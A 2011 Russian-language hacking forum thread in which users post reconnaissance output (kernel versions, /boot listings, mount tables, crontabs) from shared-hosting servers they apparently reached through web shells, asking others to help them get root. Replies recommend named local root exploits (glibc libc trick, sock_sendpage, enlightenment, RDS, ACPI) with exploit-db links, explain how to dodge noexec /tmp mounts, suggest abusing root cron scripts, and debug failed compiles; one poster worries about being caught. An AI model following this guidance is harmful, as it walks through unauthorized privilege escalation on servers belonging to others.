-rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL

-rw-r--r-- 1 root root 51238 Aug 24 2009 config-2.6.9-89.0.9.ELsmp

drwxr-xr-x 2 root root 1024 Aug 26 2009 extlinux

drwxr-xr-x 2 root root 1024 Aug 26 2009 grub

-rw-r--r-- 1 root root 505489 Feb 9 2007 initrd-2.6.9-42.0.8.EL.img

-rw-r--r-- 1 root root 495995 Feb 9 2007 initrd-2.6.9-42.0.8.ELsmp.img

-rw-r--r-- 1 root root 505219 Feb 9 2007 initrd-2.6.9-42.EL.img

-rw-r--r-- 1 root root 495765 Feb 9 2007 initrd-2.6.9-42.ELsmp.img

-rw-r--r-- 1 root root 528439 Jun 5 2008 initrd-2.6.9-67.0.15.EL.img

-rw-r--r-- 1 root root 721334 Mar 3 2009 initrd-2.6.9-78.0.13.EL.img

-rw-r--r-- 1 root root 710086 Mar 3 2009 initrd-2.6.9-78.0.13.ELsmp.img

-rw-r--r-- 1 root root 722546 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img

-rw-r--r-- 1 root root 710930 Aug 26 2009 initrd-2.6.9-89.0.9.ELsmp.img

drwx------ 2 root root 12288 Feb 9 2007 lost+found

-rw-r--r-- 1 root root 9371 Aug 12 2006 message

-rw-r--r-- 1 root root 9371 Aug 12 2006 message.ja

-rw-r--r-- 1 root root 64329 May 8 2008 symvers-2.6.9-67.0.15.EL.gz

-rw-r--r-- 1 root root 66235 Jan 14 2009 symvers-2.6.9-78.0.13.EL.gz

-rw-r--r-- 1 root root 67032 Jan 14 2009 symvers-2.6.9-78.0.13.ELsmp.gz

-rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz

-rw-r--r-- 1 root root 68382 Aug 24 2009 symvers-2.6.9-89.0.9.ELsmp.gz

-rw-r--r-- 1 root root 1504589 Jan 30 2007 vmlinuz-2.6.9-42.0.8.EL

-rw-r--r-- 1 root root 1444726 Jan 30 2007 vmlinuz-2.6.9-42.0.8.ELsmp

-rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL

-rw-r--r-- 1 root root 1444405 Aug 12 2006 vmlinuz-2.6.9-42.ELsmp

-rw-r--r-- 1 root root 1519376 May 8 2008 vmlinuz-2.6.9-67.0.15.EL

-rw-r--r-- 1 root root 1545561 Jan 14 2009 vmlinuz-2.6.9-78.0.13.EL

-rw-r--r-- 1 root root 1483646 Jan 14 2009 vmlinuz-2.6.9-78.0.13.ELsmp

-rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL

-rw-r--r-- 1 root root 1472450 Aug 24 2009 vmlinuz-2.6.9-89.0.9.ELsmp

__________________________________________________ __________________________

$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1530808 2009-06-01 09:13:15.000000000 -0400 /lib/libc-2.3.4.so

lrwxrwxrwx 1 root root 13 2009-08-26 11:25:42.000000000 -0400 /lib/libc.so.6 -> libc-2.3.4.so

lrwxrwxrwx 1 root root 11 2008-06-05 12:40:20.000000000 -0400 /lib/libcap.so -> libcap.so.1

lrwxrwxrwx 1 root root 14 2007-02-09 18:55:46.000000000 -0500 /lib/libcap.so.1 -> libcap.so.1.10

-rwxr-xr-x 1 root root 11776 2005-02-21 15:08:41.000000000 -0500 /lib/libcap.so.1.10

-rwxr-xr-x 1 root root 192392 2009-06-01 09:13:15.000000000 -0400 /lib/libcidn-2.3.4.so

lrwxrwxrwx 1 root root 16 2009-08-26 11:25:42.000000000 -0400 /lib/libcidn.so.1 -> libcidn-2.3.4.so

lrwxrwxrwx 1 root root 17 2009-08-26 11:25:55.000000000 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root 7004 2009-06-01 13:09:40.000000000 -0400 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root 41956 2009-06-01 09:13:15.000000000 -0400 /lib/libcrypt-2.3.4.so

lrwxrwxrwx 1 root root 17 2009-08-26 11:25:42.000000000 -0400 /lib/libcrypt.so.1 -> libcrypt-2.3.4.so

-rwxr-xr-x 1 root root 945120 2009-01-15 09:05:29.000000000 -0500 /lib/libcrypto.so.0.9.7a

lrwxrwxrwx 1 root root 19 2007-02-09 18:56:23.000000000 -0500 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a

__________________________________________________ __________________________

$ mount

/dev/sda2 on / type ext3 (rw,noatime,nodiratime)

none on /proc type proc (rw)

none on /sys type sysfs (rw)

none on /dev/pts type devpts (rw,gid=5,mode=620)

usbfs on /proc/bus/usb type usbfs (rw)

/dev/sda1 on /boot type ext3 (rw)

none on /dev/shm type tmpfs (rw)

/dev/sda5 on /tmp type ext3 (rw,noexec,nosuid)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

__________________________________________________ __________________________

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda2 142G 71G 70G 51% /

/dev/sda1 99M 32M 62M 34% /boot

none 2.0G 0 2.0G 0% /dev/shm

/dev/sda5 981M 18M 914M 2% /tmp

__________________________________________________ __________________________

$ cat /etc/issue

CentOS release 4.8 (Final)

Kernel \r on an \m

__________________________________________________ __________________________

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# run-parts

01 * * * * root run-parts /etc/cron.hourly

02 4 * * * root run-parts /etc/cron.daily

22 4 * * 0 root run-parts /etc/cron.weekly

42 4 1 * * root run-parts /etc/cron.monthly

*/45 * * * * root /usr/local/bin/php /usr/home/sites/aaaaaa.??????.com/xxxxxx.php

__________________________________________________ __________________________

$ cat /proc/version

Linux version 2.6.9-89.0.9.ELsmp (mockbuild@builder10.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-11)) #1 SMP Mon Aug 24 01:51:10 EDT 2009

__________________________________________________ __________________________

$ pwd

/home/??????/sites/www.??????.com/

__________________________________________________ __________________________

__________________________________________________ __________________________

Пробовал enlightenment, два из эксплоитов весят сервак: первый раз - в ребут, второй раз уснул часа на 1,5...

Glibc тоже не подходит...

много че пробовал, но чую : истина где-то рядом))

vaddd 06.10.2011 19:18

Windows NT HKWS01 5.2 build 3790

что можно попробовать?

ekoglobul 06.10.2011 20:17

Нужно помощ 2.6.32-46.1.BHsmp #1 SMP Tue Sep 6 12:18:02

Подробности:

uname -a

Linux 2.6.32-46.1.BHsmp #1 SMP Tue Sep 6 12:18:02 MDT 2011 x86_64 x86_64 x86_64 GNU/Linux

------------------------

ls -la /boot

total 71184 drwxr-xr-x 7 root root 4096 Sep 12 18:17 . drwxr-xr-x 50 root root 4096 Oct 6 09:05 .. -rw-r--r-- 1 root root 175 Oct 26 2010 .vmlinuz-2.6.18-194.17.4.el5.centos.plus.hmac -rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac -rw-r--r-- 1 root root 1244350 Oct 26 2010 System.map-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 1242340 Apr 2 2010 System.map-2.6.18-194.el5 -rw-r--r-- 1 root root 1490357 Sep 24 2010 System.map-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 1488922 Oct 22 2010 System.map-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 2157150 Nov 26 2010 System.map-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 2158628 Feb 23 2011 System.map-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 2158400 Jun 12 20:39 System.map-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 2169134 Jun 28 17:22 System.map-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 2167809 Sep 6 12:33 System.map-2.6.32-46.1.BHsmp -rw-r--r-- 1 root root 70165 Oct 26 2010 config-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 66887 Apr 2 2010 config-2.6.18-194.el5 -rw-r--r-- 1 root root 76997 Sep 24 2010 config-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 77018 Oct 22 2010 config-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 94885 Nov 26 2010 config-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 94833 Feb 23 2011 config-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 94865 Jun 12 20:39 config-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 94962 Jun 28 17:22 config-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 94986 Sep 6 12:33 config-2.6.32-46.1.BHsmp drwxr-xr-x 2 root root 4096 Apr 22 02:10 extlinux drwxr-xr-x 2 root root 4096 Sep 26 17:20 grub -rw------- 1 root root 2696144 Nov 4 2010 initrd-2.6.18-194.17.4.el5.centos.plus.img -rw------- 1 root root 2652439 Oct 13 2010 initrd-2.6.18-194.el5.img -rw------- 1 root root 2576907 Nov 4 2010 initrd-2.6.28-10.46.intel.IGB.BHsmp.img -rw------- 1 root root 2584714 Nov 5 2010 initrd-2.6.28-10.48.intel.IGB.BHsmp.img -rw------- 1 root root 3023760 Feb 4 2011 initrd-2.6.32-26.1.BHsmp.img -rw------- 1 root root 3040328 Mar 2 2011 initrd-2.6.32-29.1.BHsmp.img -rw------- 1 root root 3047216 Jun 12 20:39 initrd-2.6.32-39.1.BHsmp.img -rw------- 1 root root 3048932 Jul 1 13:05 initrd-2.6.32-42.1.BHsmp.img -rw------- 1 root root 3048934 Jul 1 11:01 initrd-2.6.32-42.1.BHsmp.img.old -rw------- 1 root root 3146429 Sep 26 17:20 initrd-2.6.32-46.1.BHsmp.img drwxr-xr-x 9 root root 4096 Jul 1 10:58 initrd29 drwxr-xr-x 9 root root 4096 Jul 1 11:25 initrd39 drwxr-xr-x 9 root root 4096 Jul 1 11:12 initrd42 -rw-r--r-- 1 root root 80032 Mar 16 2009 message -rw-r--r-- 1 root root 120758 Oct 26 2010 symvers-2.6.18-194.17.4.el5.centos.plus.gz -rw-r--r-- 1 root root 112656 Apr 2 2010 symvers-2.6.18-194.el5.gz -rw-r--r-- 1 root root 1955356 Oct 26 2010 vmlinuz-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 1953660 Apr 2 2010 vmlinuz-2.6.18-194.el5 -rw-r--r-- 1 root root 2417776 Sep 24 2010 vmlinuz-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 2413040 Oct 22 2010 vmlinuz-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 3522368 Nov 26 2010 vmlinuz-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 3522880 Feb 23 2011 vmlinuz-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 3522592 Jun 12 20:39 vmlinuz-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 3532672 Jun 28 17:22 vmlinuz-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 3531104 Sep 6 12:33 vmlinuz-2.6.32-46.1.BHsmp

------------------------------------

ls -la --full-time /lib/libc*

-rwxr-xr-x 2 root root 1693812 2011-08-12 11:48:50.000000000 -0600 /lib/libc-2.5.so lrwxrwxrwx 2 root root 11 2011-09-14 01:50:04.000000000 -0600 /lib/libc.so.6 -> libc-2.5.so lrwxrwxrwx 2 root root 11 2011-06-12 19:34:21.000000000 -0600 /lib/libcap.so -> libcap.so.1 lrwxrwxrwx 2 root root 14 2011-06-12 19:34:21.000000000 -0600 /lib/libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 2 root root 11560 2007-03-14 12:15:10.000000000 -0600 /lib/libcap.so.1.10 -rwxr-xr-x 2 root root 191708 2011-08-12 11:48:50.000000000 -0600 /lib/libcidn-2.5.so lrwxrwxrwx 2 root root 14 2011-09-14 01:50:04.000000000 -0600 /lib/libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 2 root root 17 2011-09-14 01:50:05.000000000 -0600 /lib/libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 2 root root 7812 2011-07-21 23:04:15.000000000 -0600 /lib/libcom_err.so.2.1 -rwxr-xr-x 2 root root 45432 2011-08-12 11:48:50.000000000 -0600 /lib/libcrypt-2.5.so lrwxrwxrwx 2 root root 15 2011-09-14 01:50:04.000000000 -0600 /lib/libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 2 root root 1156324 2010-03-25 06:12:53.000000000 -0600 /lib/libcrypto.so.0.9.7a -rwxr-xr-x 2 root root 1297124 2011-08-13 19:43:56.000000000 -0600 /lib/libcrypto.so.0.9.8e lrwxrwxrwx 2 root root 19 2011-06-12 19:34:21.000000000 -0600 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a lrwxrwxrwx 2 root root 19 2011-09-14 01:50:06.000000000 -0600 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e

---------------------------------

mount

/dev/sda1 on / type ext3 (rw,noatime,nodiratime,data=writeback,commit=30) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sdd1 on /home1 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdc1 on /home2 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdf1 on /home3 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sde1 on /home4 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdh1 on /home5 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdg1 on /home6 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdj1 on /home7 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sdi1 on /home8 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commi t=30) /dev/sda2 on /var type ext3 (rw,noatime,nodiratime,data=writeback,commit=30) /dev/sdb16 on /var/lib/mysql type ext3 (rw,noexec,nosuid,noatime,nodiratime,data=writebac k,commit=30) none on /var/tmp type tmpfs (rw,noexec,nosuid,noatime,nodiratime,size=3g,size= 8253160k) tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,size=8253160k) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /ramdisk on /ramdisk._ type none (rw,bind) tmpfs on /ramdisk type tmpfs (rw,size=8253160k) /dev/ram15 on /var/ramlog type ext2 (rw) cpuset on /cgroups_cpuset type cgroup (rw,cpuset) cpuctl on /cgroups_cpuctl type cgroup (rw,cpu) /dev/sdp on /backup1 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdq on /backup2 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdk on /backup3 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdl on /backup4 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdm on /backup5 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdo on /backup6 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdr on /backup7 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) /dev/sdn on /backup8 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,log bufs=8) blockio on /cgroups_blockio type cgroup (rw,blockio) /ramdisk/home on /home type none (ro,nosuid,bind,noatime,nodiratime)

-----------------------------

df -h

Filesystem Size Used Avail Use% Mounted on /dev/sda1 65G 14G 48G 22% / /dev/sdd1 917G 50G 820G 6% /home1 /dev/sdc1 917G 53G 818G 7% /home2 /dev/sdf1 917G 197G 674G 23% /home3 /dev/sde1 917G 53G 818G 6% /home4 /dev/sdh1 917G 94G 777G 11% /home5 /dev/sdg1 917G 64G 806G 8% /home6 /dev/sdj1 917G 60G 811G 7% /home7 /dev/sdi1 917G 60G 811G 7% /home8 /dev/sda2 65G 15G 47G 24% /var /dev/sdb16 99G 12G 82G 13% /var/lib/mysql none 7.9G 191M 7.7G 3% /var/tmp tmpfs 7.9G 0 7.9G 0% /dev/shm tmpfs 7.9G 97M 7.8G 2% /ramdisk /dev/ram15 248M 6.8M 229M 3% /var/ramlog /dev/sdp 2.0T 66G 1.9T 4% /backup1 /dev/sdq 2.0T 55G 1.9T 3% /backup2 /dev/sdk 2.0T 201G 1.8T 11% /backup3 /dev/sdl 2.0T 56G 1.9T 3% /backup4 /dev/sdm 2.0T 99G 1.9T 6% /backup5 /dev/sdo 2.0T 67G 1.9T 4% /backup6 /dev/sdr 2.0T 63G 1.9T 4% /backup7 /dev/sdn 2.0T 65G 1.9T 4% /backup8

--------------------

cat /proc/version

Linux version 2.6.32-46.1.BHsmp (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Tue Sep 6 12:18:02 MDT 2011

Tigger 07.10.2011 06:00

Sidarovich1975

Glibc через либу libc-*.so (https://rdot.org/forum/showpost.php?p=8233&postcount=1) тебе подойдет.

Только вместо каталога /tmp используй /home/??????/sites/www.??????.com/, т.к. /tmp у тебя смонтирован в другой раздел, а вот как раз /home (судя по выводу команды mount) у тебя отдельно не смонтирован. Т.е. тебе надо заменить по той ссылке что я дал выше все пути с /tmp на /home/... (до той директорию где будут права на write)

Можешь еще попробовать sock_sendpage3 (http://www.exploit-db.com/exploits/9641/), ну и enlightenment туда же. Но все же лучше сначала попробуй Glibc.

ekoglobul

Нет. Сентябрь 2011г, Глибц свежий.

Sidarovich1975 07.10.2011 11:06

Цитата:

Сообщение от Tigger
Tigger said:
Sidarovich1975
Glibc через либу libc-*.so (https://rdot.org/forum/showpost.php?p=8233&postcount=1) тебе подойдет.
Только вместо каталога
/tmp
используй
/home/??????/sites/www.??????.com/
, т.к. /tmp у тебя смонтирован в другой раздел, а вот как раз /home (судя по выводу команды
mount
) у тебя отдельно не смонтирован. Т.е. тебе надо заменить по той ссылке что я дал выше все пути с /tmp на /home/... (до той директорию где будут права на
write
)
Можешь еще попробовать
sock_sendpage3
(http://www.exploit-db.com/exploits/9641/), ну и enlightenment туда же. Но все же лучше сначала попробуй Glibc.
.

не проходит ниччего:

Glibc я пробовал из

/var/tmp/

ну сейчас попробовал по совету

/home/??????/sites/www.??????.com/

вывод тот же (пишет, что неправильно указал атрибуты ping)

и сплоит этот тоже пробовал

пишет:

socket: Address family not supported by protokol

socket: Address family not supported by protokol

socket: Address family not supported by protokol

socket: Address family not supported by protokol

socket: Socket type not supported

socket: Address family not supported by protokol

по поводу enlightenment я писал :

Цитата:

Сообщение от None
Пробовал enlightenment, два из эксплоитов весят сервак: первый раз - в ребут, второй - уснул часа на 1,5...

больше не хочу - спалюсь...

sevenup 07.10.2011 17:02

Цитата:

Сообщение от Sidarovich1975
Sidarovich1975 said:
не проходит ниччего:
Glibc я пробовал из
/var/tmp/
ну сейчас попробовал по совету
/home/??????/sites/www.??????.com/
вывод тот же (пишет, что неправильно указал атрибуты ping)
и сплоит этот тоже пробовал
пишет:
socket: Address family not supported by protokol
socket: Address family not supported by protokol
socket: Address family not supported by protokol
socket: Address family not supported by protokol
socket: Socket type not supported
socket: Address family not supported by protokol
по поводу enlightenment я писал :
больше не хочу - спалюсь...

www.1337day.com/exploits/17022

И будет тебе счастье

Tigger 07.10.2011 21:36

Sidarovich1975

1. Вместо ping, можно использовать любой суидник. Попробуй ping6

2. Ты после того, как получил ошибку о неправильных параметрах ping, проверил вывод id? Потому что в ошибке ping'a ничего удивительного нет =)

3. Попробуй другие версии sendpage:

sock_sendpage2: http://www.exploit-db.com/exploits/9598/ - вот второй к примеру.

4. А ты не помнишь какой сплоит из энглимента положил сервак? pipe?

Цитата:

Сообщение от sevenup
sevenup said:
www.1337day.com/exploits/17022
И будет тебе счастье

Хм... Впервые вижу этот сплоит...

ZARO 07.10.2011 22:48

Помогите порутать сервак, пожалуйста.

Код:

Code:
sh-3.2$ uname -a
Linux  2.6.35.7-grsec #1 SMP Sat Nov 20 02:14:33 CST 2010 x86_6
4 x86_64 x86_64 GNU/Linux
sh-3.2$ ls -la /boot
total 29316
drwxr-xr-x  5 root root    1024 May 11 06:58 .
drwxr-xr-x 32 root root    4096 Oct  7 11:59 ..
-rw-r--r--  1 root root    163 Jan 20  2010 .vmlinuz-2.6.18-164.11.1.el5.hmac
-rw-r--r--  1 root root    158 Sep  3  2009 .vmlinuz-2.6.18-164.el5.hmac
-rw-r--r--  1 root root    163 Nov  9  2010 .vmlinuz-2.6.18-194.26.1.el5.hmac
-rw-r--r--  1 root root 1227215 Jan 20  2010 System.map-2.6.18-164.11.1.el5
-rw-r--r--  1 root root 1225101 Sep  3  2009 System.map-2.6.18-164.el5
-rw-r--r--  1 root root 1243713 Nov  9  2010 System.map-2.6.18-194.26.1.el5
-rw-r--r--  1 root root 1852342 Nov 20  2010 System.map-2.6.35.7-grsec
-rw-r--r--  1 root root    6144 Nov 29  2010 aquota.user
lrwxrwxrwx  1 root root      2 Nov 29  2010 boot -> ..
-rw-r--r--  1 root root  65972 Jan 20  2010 config-2.6.18-164.11.1.el5
-rw-r--r--  1 root root  65937 Sep  3  2009 config-2.6.18-164.el5
-rw-r--r--  1 root root  66892 Nov  9  2010 config-2.6.18-194.26.1.el5
-rw-r--r--  1 root root  55462 Nov 20  2010 config-2.6.35.7-grsec
drwxr-xr-x  3 root root    1024 Nov 29  2010 efi
drwxr-xr-x  2 root root    1024 Nov 30  2010 grub
-rw-------  1 root root 2738962 Feb  8  2010 initrd-2.6.18-164.11.1.el5.img
-rw-------  1 root root 2716904 Oct 25  2009 initrd-2.6.18-164.el5.img
-rw-------  1 root root 2733309 Nov 30  2010 initrd-2.6.18-194.26.1.el5.img
-rw-------  1 root root 2317918 Nov 30  2010 initrd-2.6.35.7-grsec.img
drwx------  2 root root  12288 Oct 26  2009 lost+found
-rw-r--r--  1 root root  80032 Mar 16  2009 message
-rw-r--r--  1 root root      32 Nov 29  2010 quota.user
-rw-r--r--  1 root root  108759 Jan 20  2010 symvers-2.6.18-164.11.1.el5.gz
-rw-r--r--  1 root root  108707 Sep  3  2009 symvers-2.6.18-164.el5.gz
-rw-r--r--  1 root root  112729 Nov  9  2010 symvers-2.6.18-194.26.1.el5.gz
-rwxr-xr-x  1 root root 3838217 Nov 20  2010 vmlinux-2.6.35.7-grsec.bz2
-rw-r--r--  1 root root 1936156 Jan 20  2010 vmlinuz-2.6.18-164.11.1.el5
-rw-r--r--  1 root root 1932284 Sep  3  2009 vmlinuz-2.6.18-164.el5
-rw-r--r--  1 root root 1955356 Nov  9  2010 vmlinuz-2.6.18-194.26.1.el5
-rw-r--r--  1 root root 3453904 Nov 20  2010 vmlinuz-2.6.35.7-grsec
sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1693812 2011-08-12 12:48:50.000000000 -0500 /lib/libc-2.5
.so
lrwxrwxrwx 1 root root      11 2011-09-14 01:23:33.000000000 -0500 /lib/libc.so.
6 -> libc-2.5.so
lrwxrwxrwx 1 root root      14 2010-11-29 07:08:24.000000000 -0600 /lib/libcap.s
o.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root  11560 2007-03-14 13:15:10.000000000 -0500 /lib/libcap.s
o.1.10
-rwxr-xr-x 1 root root  191708 2011-08-12 12:48:50.000000000 -0500 /lib/libcidn-
2.5.so
lrwxrwxrwx 1 root root      14 2011-09-14 01:23:33.000000000 -0500 /lib/libcidn.
so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 2011-09-14 01:23:36.000000000 -0500 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    6364 2011-07-22 00:04:15.000000000 -0500 /lib/libcom_e
rr.so.2.1
-rwxr-xr-x 1 root root  45432 2011-08-12 12:48:50.000000000 -0500 /lib/libcrypt
-2.5.so
lrwxrwxrwx 1 root root      15 2011-09-14 01:23:33.000000000 -0500 /lib/libcrypt
.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-08-13 20:43:56.000000000 -0500 /lib/libcrypt
o.so.0.9.8e
lrwxrwxrwx 1 root root      14 2010-11-29 07:08:18.000000000 -0600 /lib/libcrypt
o.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root      19 2011-09-14 01:23:36.000000000 -0500 /lib/libcrypt
o.so.6 -> libcrypto.so.0.9.8e
sh-3.2$ mount
/dev/sda3 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda1 on /boot type ext2 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
sh-3.2$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3            1.4T  664G  640G  51% /
tmpfs                3.9G    0  3.9G  0% /dev/shm
/dev/sda1            119M  31M  88M  27% /boot
/usr/tmpDSK          2.4G  1.1G  1.3G  46% /tmp
sh-3.2$ cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.

sh-3.2$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

*/5 * * * * root /etc/rrdtool/scripts/indexer cron > /dev/null 2>&1

* * * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/s
ummary.php > /dev/null
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/s
ummary.daily.php > /dev/null
sh-3.2$ cat /proc/version
Linux version 2.6.35.7-grsec (root@testserver.justhost.com) (gcc version 4.1.2 2
0080704 (Red Hat 4.1.2-48)) #1 SMP Sat Nov 20 02:14:33 CST 2010
sh-3.2$ cat /proc/sys/vm/mmap_min_addr
65536
sh-3.2$ pwd
/home/cardaut1/public_html/webadmin
sh-3.2$


Tigger 07.10.2011 22:56

ZARO

Думаю, что только если RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c

Отпишись потом взялось или нет, если нет, то что вывелось хотя бы.

UPD:

Хотя, судя по дате сборки ядра, оно скорее всего запатчено...

Еще можешь попробовать ACPI: http://www.exploit-db.com/exploits/15774/ но тут я хз.

Код:

Code:
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.daily.php > /dev/null

Сомневаюсь конечно, но какие у тебя права на /var/server_monitor и на /var/server_monitor/summary.daily.php

ZARO 07.10.2011 23:19

Цитата:

Сообщение от Tigger
Tigger said:
ZARO
Думаю, что только если RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Отпишись потом взялось или нет, если нет, то что вывелось хотя бы.
UPD:
Хотя, судя по дате сборки ядра, оно скорее всего запатчено...
Еще можешь попробовать ACPI: http://www.exploit-db.com/exploits/15774/ но тут я хз.
Код:

Code:
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.daily.php > /dev/null

Сомневаюсь конечно, но какие у тебя права на /var/server_monitor и на /var/server_monitor/summary.daily.php

sh-3.1$ gcc 1.c -o 2nd

1.c: In function 'prep_sock':

1.c:53: error: 'PF_RDS' undeclared (first use in this function)

1.c:53: error: (Each undeclared identifier is reported only once

1.c:53: error: for each function it appears in.)


Это выдает когда компилю http://www.vsecurity.com/download/tools/linux-rds-exploit.c

А второй сплоит не берет

http://i061.radikal.ru/1110/a0/63c8568af92c.jpg

Права на/var/server_monitor -> drwxr-xr-x

Права на /var/server_monitor/summary.daily.php -> -rw-r--r--

Tigger 07.10.2011 23:27

Цитата:

Сообщение от ZARO
ZARO said:
sh-3.1$ gcc 1.c -o 2nd

1.c: In function 'prep_sock':

1.c:53: error: 'PF_RDS' undeclared (first use in this function)

1.c:53: error: (Each undeclared identifier is reported only once

1.c:53: error: for each function it appears in.)

Это выдает когда компилю http://www.vsecurity.com/download/tools/linux-rds-exploit.c
А второй сплоит не берет
http://i061.radikal.ru/1110/a0/63c8568af92c.jpg
Права на
/var/server_monitor -> drwxr-xr-x
Права на
/var/server_monitor/summary.daily.php -> -rw-r--r--

По поводу первого сплоита вот прочитай: https://rdot.org/forum/showthread.php?t=820

Там в посте #9 можно скачать уже скопиленный сплоит, попробуй.

И в посте #6 указано как изменить сплоит, чтобы компилировался. Попробуй оба варианта.

По поводу крона:

А владелец файла, случайно так, не тот юзер под которым ты? Хотя вероятность крайне мала

У тебя ядро просто ноябрь 2010г, это считай 2011г, тут мало шансов чем-то ядерным пробить.

Sidarovich1975 07.10.2011 23:58

Цитата:

Сообщение от None
Sidarovich1975 1. Вместо ping, можно использовать любой суидник. Попробуй ping6 2. Ты после того, как получил ошибку о неправильных параметрах ping, проверил вывод id? Потому что в ошибке ping'a ничего удивительного нет =) 3. Попробуй другие версии sendpage: sock_sendpage2: http://www.exploit-db.com/exploits/9598/ - вот второй к примеру. 4. А ты не помнишь какой сплоит из энглимента положил сервак? pipe?

1.ping6 - тот же вывод...

2.Естессссно, даже несколько раз вводил id

